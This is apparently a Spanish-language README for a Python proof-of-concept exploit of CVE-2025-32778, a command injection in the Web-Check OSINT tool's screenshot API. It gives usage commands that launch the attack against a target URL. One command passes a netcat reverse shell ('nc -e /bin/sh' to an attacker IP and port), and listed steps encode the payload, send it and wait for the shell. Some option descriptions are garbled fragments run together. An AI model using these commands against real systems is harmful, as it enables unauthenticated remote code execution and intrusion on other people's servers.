
Exploit PoC para CVE-2025-32778: inyección de comandos en la herramienta OSINT Web-Check
CVE-2025-32778 es una vulnerabilidad crítica de inyección de comandos en la herramienta OSINT Web-Check de Lissy93.
Permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema a través del parámetro url en la API de captura de pantalla.
Este script de Python automatiza la explotación y puede generar shells inversas o aceptar payloads de shell personalizados.
url en Web-Check.--lhost y --lport.--shell.--shell con --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
Normalizar la URL objetivo a scheme://host[:port].
Preparar el payload:
--lhost y --lport.--shell.Codificar el payload de shell para una inyección segura en la URL.
Enviar una solicitud HTTP GET a /api/screenshot/ con el payload.
Esperar la conexión de la shell inversa.
00xCanelo
GitHub Profile